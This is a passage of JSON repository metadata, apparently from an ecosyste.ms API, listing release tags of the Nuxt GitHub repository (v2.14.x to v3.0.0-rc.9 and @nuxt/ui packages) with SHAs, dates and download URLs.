tml_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4